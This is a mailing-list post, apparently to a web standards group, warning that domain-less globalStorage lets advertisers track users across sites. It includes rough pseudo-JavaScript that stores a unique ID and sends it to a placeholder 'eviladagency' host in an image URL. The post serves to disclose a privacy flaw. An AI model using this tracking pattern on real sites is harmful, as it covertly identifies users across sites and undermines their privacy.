Hello All! <br>
<br>
This is my first post here, so apologies in advance if I'm not quite up on the list etiquette. <br>
<br>
I was just comparing the Storage API with that of the <a href="http://gears.google.com">Google Gears</a>,
and something jumped out at me. According to the spec, browsers should
allow a webapp to store data in the globalStorage object with no domain
attached. (i.e. <span style="font-family: courier new,monospace;">globalStorage['']</span>) This is intended to allow data to be shared across all webpages. <br>
<br>
My concern is that this poses a problem for the user's privacy. Let's
say that I'm an Evil Advertisement site. It is in my interest to
penetrate the user's veil of privacy and determine which pages they
visit. I've traditionally used cookies for this, but the browser makers
foiled my attempts by allowing cookies to only be accepted from the
originating site. But thanks to the new globalStorage API, I can store
a Unique ID in the user's browser, then use Javascript to retrieve it
every time they download one of my ads. <br>
<br>
Here's some rough psuedo-js to demonstrate how it might work:<br>
<br>
<div style="margin-left: 40px;"><span style="font-family: courier new,monospace;"><script></span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">if(!gloabalStorage[''].evilbit) gloabalStorage[''].evilbit = createUUID();</span><br style="font-family: courier new,monospace;">
<br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">var createUUID()</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">{</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;"> //return a unique identifier using a random algorithm.</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">}</span><br style="font-family: courier new,monospace;">
<br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">var displayEvilAd(type)</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">{</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;"> document.write('<img src="<a href="http://www.eviladagency.com">http://www.eviladagency.com</a>' + <br>
'/getAdvertisement.asp' +<br>
'</span><span style="font-family: courier new,monospace;">?</span><span style="font-family: courier new,monospace;">type=' + type + <br>
'&tracking=' + gloabalStorage[''].evilbit+'">');</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">}</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;"></script></span><br style="font-family: courier new,monospace;">
<br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">...</span><br style="font-family: courier new,monospace;">
<br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;"><script>displayEvilAd("banner");</script></span><br>
</div>
<br>
Is there something I'm missing that would prevent this?<br>
<br>
Thanks,<br>
Jerason Banes<br>